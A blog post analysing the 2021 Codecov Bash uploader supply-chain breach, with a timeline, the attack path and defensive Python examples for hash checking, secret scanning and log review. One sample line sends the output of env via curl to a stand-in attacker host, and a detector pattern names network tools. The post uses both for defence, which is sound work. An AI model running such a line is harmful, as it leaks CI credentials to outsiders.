TL;DR

This breach was carried out by sophisticated attackers who exploited a mistake in how Codecov built its Docker images. They used it to modify Codecov's Bash uploader script so that it sent the environment variables from the CI environments of Codecov customers to a remote server. While the attackers could have conducted multiple attacks from there, other disclosures show that one path they did take was using the git credentials in the CI environment to access private git repositories, then exploiting the secrets and data within. This shows the importance of keeping your git repositories clean and ensuring we don’t use production credentials in our CI environment where possible.

What is Codecov?

Codecov is a code coverage tool: essentially, it checks how much of your application's code is exercised by tests. When we build modern applications using continuous integration (CI) and continuous deployment (CD), we want automated tests in place so that when we release a new feature, we can be confident that it works as intended and hasn't unintentionally broken other features within the application.

Codecov example
Image from Codecov

Ideally we want to test every line of code, every function and every feature during this process, but that requires quite mature test automation. Codecov can help develop it because it shows which lines of code aren't being tested in your CI environment.

What happened - quick timeline of events

On January 31st, 2021, malicious actors were able to modify Codecov's Bash uploader script. They did this by leveraging credentials they were able to extract from a Docker image (more on this later).

Between January 31st and April 1st, the attackers were able to squat inside Codecov and extract the environment variables from the CI environments of Codecov's customers.

On April 1st, it was actually one of Codecov's customers who noticed that the Bash uploader had a different hash value from the one published on Codecov's website, indicating that something was wrong.

Codecov investigated and fixed the issue, then on April 15th, after a thorough investigation, publicly announced that they had been breached and notified their customers.
Source: https://about.codecov.io/security-update/
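
The hash mismatch that the customer spotted can also be checked automatically before a downloaded script is run. Below is a minimal sketch of that idea, assuming the vendor publishes a SHA-256 digest for the script. The function names, the stand-in script bytes and the `attacker.example` address are illustrative assumptions, not taken from Codecov's tooling.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def matches_published_hash(script: bytes, published_hex: str) -> bool:
    """Return True only if the script's digest equals the published one."""
    actual = sha256_hex(script)
    expected = published_hex.strip().lower()
    # compare_digest does a constant-time comparison of the two hex strings.
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    # Stand-in bytes; in CI this would be the downloaded uploader script.
    original = b"#!/usr/bin/env bash\necho uploading coverage\n"
    # A hypothetical tampered copy with one extra line appended.
    tampered = original + b'curl -d "$(env)" http://attacker.example/ || true\n'
    # Stands in for the digest published on the vendor's website.
    published = sha256_hex(original)

    print(matches_published_hash(original, published))
    print(matches_published_hash(tampered, published))
```

In a pipeline, a check like this would run between downloading the script and executing it, and the job would stop if the check fails. It only helps if the published digest comes from a channel the attacker has not also modified.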

So what does this all mean, how does it affect Codecov users, and why is this type of attack a concerning trend for other CI tools?

Why is this type of attack significant?

This type of attack is called a supply chain attack because Codecov sits in your software supply chain. Just like a supply chain in the physical world, each part of the chain handles lots of different goods from many different customers. When attackers compromise one link in the chain, they can breach multiple organizations.

Example software supply chain

Using the oversimplified example above of a modern software supply chain, we can follow its typical stages.

  1. We create or modify our code
  2. Commit and push this code into our repositories
  3. New code goes to CI environment
    a. The application is compiled
    b. We run tests on the application
    c. We produce reports on how our app performs
  4. Code moves to CD pipeline
    a. Final changes reviewed
    b. Staging application deployed
    c. Production application deployed

Let's focus on the CI environment. We can do a lot of powerful automation in this stage to test our application. But how we build applications has changed, and we now rely on multiple external services: databases, payment systems, cloud infrastructure and more. All these components need to be accessed by the tools within the CI environment so they can build and test the application. For this reason, the CI environment needs access to the secrets or credentials that grant access to these systems. Hopefully, if we have built a secure CI environment, we are using staging infrastructure, which is less critical. But it is still very common for production credentials to be used and, most importantly, it is highly likely that the CI environment will have access to the git repository, which is known to contain a trove of sensitive information.
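
To get a feel for how much a single script running in CI can see, here is a minimal sketch that lists the environment variables whose names suggest a secret. The naming pattern is a hypothetical heuristic chosen for illustration, so it will miss some secrets and flag some harmless variables.

```python
import os
import re
from typing import List, Mapping

# Hypothetical naming heuristic, not an exhaustive rule.
SENSITIVE_NAME = re.compile(
    r"TOKEN|SECRET|PASSWORD|PASSWD|API_?KEY|CREDENTIAL|PRIVATE_KEY",
    re.IGNORECASE,
)


def sensitive_names(env: Mapping[str, str]) -> List[str]:
    """Return the sorted names of variables whose name suggests a secret."""
    return sorted(name for name in env if SENSITIVE_NAME.search(name))


if __name__ == "__main__":
    # Print names only, never values, so the audit itself leaks nothing.
    for name in sensitive_names(os.environ):
        print(name)
```

Any tool invoked inside the same CI job can read the same variables, which is why a short list here is a good sign.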

So by attacking Codecov, the attackers could gain access to the credentials within the CI environments of ALL affected Codecov customers.

How the attackers breached Codecov

Now that we understand why a supply chain attack can be highly impactful, let's go through the steps the attackers took to breach Codecov.

The attackers exploited an error in how Codecov created its Docker images. This error allowed them to extract a credential from a Docker image, and that credential let them modify Codecov's Bash uploader script. A Bash script is just a set of instructions, similar to what you would type into your terminal, saved in a file so they can be run programmatically. The attackers added a single line of code to this script: an additional step that sent all the environment variables from the CI environment to a remote server they controlled, essentially taking the sensitive information that makes your application run and handing it to the bad guys. This single line was, if I can say so, beautifully executed, hidden on line 525 of an 1,800+ line script. Without knowing it was there, it would be extremely difficult to find.

Codecov bash uploader malicious code
Extract code from bash uploader

View the entire compromised bash uploader script
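
A single exfiltration line in a long script is hard to spot by eye, but a simple heuristic can at least flag candidates for review. The sketch below reports lines that both dump the environment and call a network tool. The patterns are illustrative assumptions, and the sample script is made up for the example rather than copied from the compromised uploader.

```python
import re
from typing import List, Tuple

# Commands commonly used to send data over the network.
NETWORK_TOOL = re.compile(r"\b(curl|wget|nc)\b")
# Command substitutions that capture the whole environment.
ENV_DUMP = re.compile(r"\$\(\s*(env|printenv)\s*\)|`\s*(env|printenv)\s*`")


def suspicious_lines(script: str) -> List[Tuple[int, str]]:
    """Return (line number, line) pairs that dump env and call a network tool."""
    hits = []
    for number, line in enumerate(script.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # skip comments and the shebang line
        if NETWORK_TOOL.search(stripped) and ENV_DUMP.search(stripped):
            hits.append((number, stripped))
    return hits


if __name__ == "__main__":
    # Made-up sample; attacker.example and vendor.example are placeholders.
    sample = "\n".join([
        "#!/usr/bin/env bash",
        "echo 'collecting coverage'",
        'curl -s -d "$(env)" http://attacker.example/upload || true',
        "curl -s https://vendor.example/upload -F file=@coverage.xml",
    ])
    for number, line in suspicious_lines(sample):
        print(number, line)
```

A determined attacker can easily evade a pattern like this, for example by splitting the command across lines, so it complements hash verification rather than replacing it.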

Who was affected by this?

Codecov has 23,000 customers/users, and anyone who used the compromised version of the Bash uploader between January 31st and April 1st may have been affected. Large organizations such as Twilio, HashiCorp, Rapid7 and Confluent have released their own statements about how this affected them.

What did the attackers do?

Because there are so many potential victims, we cannot be sure of all the ways the attackers leveraged the sensitive information they stole. However, the public disclosures give us an idea. A good example is Twilio.

On April 22, 7 days after the public announcement of the breach, GitHub noticed suspicious activity related to the Codecov breach: private repositories had been cloned, and some Twilio user tokens were exposed within those repositories.

While this example is very small relative to the scale of the breach, it clearly shows one path the attackers took.

  1. Compromise Codecov
  2. Use stolen git credentials from bash uploader
  3. Access private repositories using stolen git credentials
  4. Scan repositories for sensitive information and secrets
  5. Exploit secrets
Codecov attack path

This shows that private git repositories were a clear target for the attackers.

What should you do if you have been affected?

If you were using Codecov between January 31st and April 1st then it's very important that you take action now.

Revoke secrets

The first thing you should do is rotate all your credentials. This means all the credentials your CI environment has access to, even if they are not used in production environments, as these can still be used to move laterally. It also means revoking any credentials that were stored within git repositories or other remote data stores that the CI environment had access to.

Check logs

Next, analyze your logs for suspicious activity. This will give an indication of whether or not the attackers have penetrated your systems.
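
As a rough illustration of what such a log review might look like, the sketch below flags repository clone and fetch events that came from unfamiliar IP addresses on or after the start of the exposure window. The event fields (`timestamp`, `action`, `ip`) and the action names are a hypothetical format chosen for the example, so they would need to be mapped onto whatever your git host or cloud provider actually records.

```python
from datetime import datetime, timezone
from typing import Dict, FrozenSet, Iterable, List, Set

# Start of the exposure window given in the timeline above.
EXPOSURE_START = datetime(2021, 1, 31, tzinfo=timezone.utc)

# Hypothetical action names for repository reads.
WATCHED_ACTIONS: FrozenSet[str] = frozenset({"git.clone", "git.fetch"})


def suspicious_events(
    events: Iterable[Dict[str, str]], known_ips: Set[str]
) -> List[Dict[str, str]]:
    """Return watched events from unknown IPs on or after EXPOSURE_START."""
    flagged = []
    for event in events:
        # Assumes ISO 8601 timestamps that include a UTC offset.
        when = datetime.fromisoformat(event["timestamp"])
        if when < EXPOSURE_START:
            continue
        if event["action"] in WATCHED_ACTIONS and event["ip"] not in known_ips:
            flagged.append(event)
    return flagged


if __name__ == "__main__":
    # Made-up events using documentation-reserved IP addresses.
    events = [
        {"timestamp": "2021-01-15T09:00:00+00:00", "action": "git.clone", "ip": "203.0.113.9"},
        {"timestamp": "2021-02-10T08:00:00+00:00", "action": "git.clone", "ip": "198.51.100.7"},
        {"timestamp": "2021-03-02T12:30:00+00:00", "action": "git.clone", "ip": "203.0.113.9"},
        {"timestamp": "2021-03-05T12:30:00+00:00", "action": "issue.create", "ip": "203.0.113.9"},
    ]
    for event in suspicious_events(events, known_ips={"198.51.100.7"}):
        print(event["timestamp"], event["action"], event["ip"])
```

The window deliberately has no end date, since stolen credentials remain usable until they are rotated.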

Scan code repositories and Docker images

By now it should be clear how important it is to keep our git repositories clean and free of sensitive information. Secrets can be hidden deep in the commit history of a project, making them very difficult to find. This is why it is crucial to use automated detection.
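
To give an idea of what automated detection looks for, here is a minimal sketch that searches text for two well-known secret formats: AWS access key IDs and PEM private key headers. It is only an illustration with two patterns, not how any particular product works. The sample uses the example key ID from AWS's own documentation.

```python
import re
from typing import List, Tuple

# Two well-known formats; real scanners cover many more and validate matches.
PATTERNS = {
    "AWS access key ID": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private key header": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"
    ),
}


def find_secrets(text: str) -> List[Tuple[int, str]]:
    """Return (line number, pattern label) for each secret-like match."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((number, label))
    return findings


if __name__ == "__main__":
    # Made-up diff text containing AWS's documented example key ID.
    sample = "\n".join([
        "+region = eu-west-1",
        "+aws_key = AKIAIOSFODNN7EXAMPLE",
        "+-----BEGIN RSA PRIVATE KEY-----",
    ])
    for number, label in find_secrets(sample):
        print(number, label)
```

To cover the commit history rather than just the current files, one option is to run a function like this over the output of `git log -p --all`.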

Secrets can also hide in Docker images.

GitGuardian provides a free tier of its code security platform, which will quickly uncover any secrets.

Add two-way authentication for machines

The final step you may choose to take is adding two-way authentication for machines accessing secrets. This means you can grant your CI environment access to your systems while adding another encryption and authentication step, so attackers cannot use the credentials even if they get exposed. This is a significant step, and fantastic products like HashiCorp Vault exist that can do this. Bear in mind that these tools are often complicated and costly to install (even if the underlying tool is open source). But this will leave you far better protected in the event of an attack like this one.

Is Codecov safe?

This is often an uncomfortable question, but I will share my thoughts on it.

Firstly, it is impossible to reduce the risk of a breach to zero. New vulnerabilities and exploits are discovered every day, so there is always a risk that tools within your supply chain will be compromised. The attack on Codecov was clearly conducted by sophisticated attackers, and while they were able to exploit a mistake, it was not a trivial exploit.

The other consideration is communication. Codecov were very upfront about the breach and have continued to provide new information, which is a good sign.

While I believe we need to be critical of the tools we introduce into our supply chain, it is reasonable to expect that Codecov have fixed the underlying problem and conducted a serious security audit following the breach.

The final comment on this falls back to the customers of Codecov. Of course we expect our vendors to take security measures seriously, but we also need to take responsibility for our own security. This means making sure we don’t use production credentials in our CI environment, ensuring our git repositories are clean and having response plans in place. If we can do this then we can

That's it!

Hopefully you found this article useful in understanding how this attack was conducted. If you have any questions or comments, or want to request a breach review, reach out to me on Twitter at @advocatemack or use the hashtag #askmack.

If you are interested in other 2022 data breaches and attacks, you can find a detailed analysis of the Uber breach and of the Toyota data breach.